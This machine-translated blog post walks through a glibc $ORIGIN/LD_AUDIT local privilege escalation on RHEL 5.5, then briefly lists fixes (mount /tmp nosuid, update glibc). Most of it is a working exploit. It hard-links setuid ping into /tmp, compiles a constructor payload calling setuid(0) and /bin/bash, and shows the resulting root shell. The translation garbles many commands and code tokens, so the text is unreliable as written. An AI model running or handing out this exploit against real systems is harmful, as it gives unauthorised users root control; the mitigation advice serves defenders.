Linux gcc ++ vulnerability: common users get root privileges

Linux gcc ++ vulnerability: common users have root permissions and have been tested on RHEL5.5 32.

Principle: The gnu c library dynamic linker expands $ ORIGIN in setuid library search path

1. Create a common test user:
[Root @ www.bkjia.com ~] # Useradd test
[Root @ www.bkjia.com ~] # Passwd test
Changing password for user test.
New UNIX password:
Bad password: it is too short
Retype new UNIX password:
Passwd: all authentication tokens updated successfully.

2. Switch to this user:
[Root @ www.bkjia.com ~] # Su-test
[Test @ www.bkjia.com ~] $ Whoami
Test
[Test @ www.bkjia.com ~] $ Useradd user1
-Bash: useradd: command not found

3. Start Elevation of Privilege
[Test @ www.bkjia.com ~] $ Mkdir/tmp/exploit
[Test @ www.bkjia.com ~] $ Ln/bin/ping/tmp/exploit/target
[Test @ www.bkjia.com ~] $ Exec 3 </tmp/exploit/target
[Test @ www.bkjia.com ~] $ Ls-l/proc/$/fd/3
Lr-x ------ 1 test 64 08-07/proc/5922/fd/3->/tmp/exploit/target
[Test @ www.bkjia.com ~] $ Rm-rf/tmp/exploit/
[Test @ www.bkjia.com ~] $ Ls-l/proc/$/fd/3
Lr-x ------ 1 test 64 08-07/proc/5922/fd/3->/tmp/exploit/target (deleted)
[Test @ www.bkjia.com ~] $ Cat> payload. c
----------------------------------------
Void _ attribute _ (constructor) init ()
{
Setuid (0 );
System ("/bin/bash ");
}
----------------------------------------
[Test @ www.bkjia.com ~] $ Cat payload. c
Void _ attribute _ (constructor) init ()
{
Setuid (0 );
System ("/bin/bash ");
}
[Test @ www.bkjia.com ~] $ Gcc-w-fPIC-shared-o/tmp/exploit payload. c
[Test @ www.bkjia.com ~] $ Ls-l/tmp/exploit
-Rwxrwxr-x 1 test 4223 08-07/tmp/exploit
[Test @ www.bkjia.com ~] $ LD_AUDIT = "$ ORIGIN" exec/proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-I interval] [-w deadline]
[-P pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[-T timestamp option] [-Q tos] [hop1...] destination

4. Permission Verification:
[Root @ www.bkjia.com ~] # Whoami
Root
[Root @ www.bkjia.com ~] # Useradd user1
[Root @ www.bkjia.com ~] # Useradd user2
[Root @ www.bkjia.com ~] # Ls/home/
Test user1 user2
[Root @ www.bkjia.com ~] # Id
Uid = 0 (root) gid = 0 (root) groups = 0 (root), 1 (bin), 2 (daemon), 3 (sys), 4 (adm ), 6 (disk), 10 (wheel)

We can see the result of Elevation of Privilege. As an O & M engineer, we need to provide a solution to this problem!

There are two solutions:
1. Bind a directory
Nosuid Principle: For files such as/etc/passwd, only the root user has the permission to modify the password, but the user can also modify his/her password (actions beyond its own permissions) nosuid can stop this method of Elevation of Privilege. For example, the/tmp directory has such permissions, and we need to strictly control it.

Mount-o bind/tmp
Mount-o remount, bind, nosuid/tmp

2. Update glibc (officially recommended by RedHat)
Yum-y update glibc

I hope that the O & M colleagues in this article can update the software and patches in a timely manner.

Recommended reading:

Write a trojan program in Linux C to steal the root user password

Researchers found the most advanced Android Trojan Horse

Sharing the trojan program in Linux

Security researchers: More Trojans lock the target Linux System

Scan Trojan viruses with anti-virus software clamav in Linux